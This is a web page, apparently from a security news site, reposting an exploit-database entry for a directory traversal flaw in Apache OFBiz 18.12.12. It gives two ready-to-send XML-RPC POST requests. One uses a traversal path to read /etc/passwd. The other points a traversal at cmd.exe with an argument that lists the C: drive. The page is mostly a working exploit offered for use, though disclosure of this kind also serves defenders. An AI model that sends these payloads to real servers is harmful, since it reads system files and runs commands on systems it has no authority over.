Home Tools Exploits & CVE's Apache OFBiz 18.12.12 Directory Traversal

Apache OFBiz 18.12.12 Directory Traversal

May 22, 2024

103

Apache OFBiz versions 18.12.12 and below suffer from a directory traversal vulnerability.

# Exploit Title: Apache OFBiz 18.12.12 - Directory Traversal
# Google Dork: N/A
# Date: 2024-05-16
# Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly)
# Vendor Homepage: https://ofbiz.apache.org/
## Software Link: https://ofbiz.apache.org/download.html
# Version: below <=18.12.12
# Tested on: Windows10


Poc.
1-
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>example.createBlogPost</methodName>
  <params>
    <param>
      <value><string>../../../../../../etc/passwd</string></value>
    </param>
  </params>
</methodCall>

OR

2-
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>performCommand</methodName>
  <params>
    <param>

<value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:</string></value>
    </param>
  </params>
</methodCall>

Apache OFBiz 18.12.12 Directory Traversal

Follow us on Instagram @thecyberpost

EDITOR PICKS

Texas judge upholds hospitals’ right to use online tracking technology

SPA-CART CMS 1.9.0.6 Username Enumeration / Business Logic Flaw

Backdoor.Win32.Plugx MVID-2024-0686 Insecure Permissions

POPULAR POSTS

Oracle Database Password Hash Unauthorized Access

ESET NOD32 Antivirus 17.1.11.0 Unquoted Service Path

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

POPULAR CATEGORY

SugarCRM 12.2.0 Shell Upload

WordPress Duplicator 1.4.7 Information Disclosure

Backdoor.Win32.Xtreme.yvp Insecure Permissions / Privilege Escalation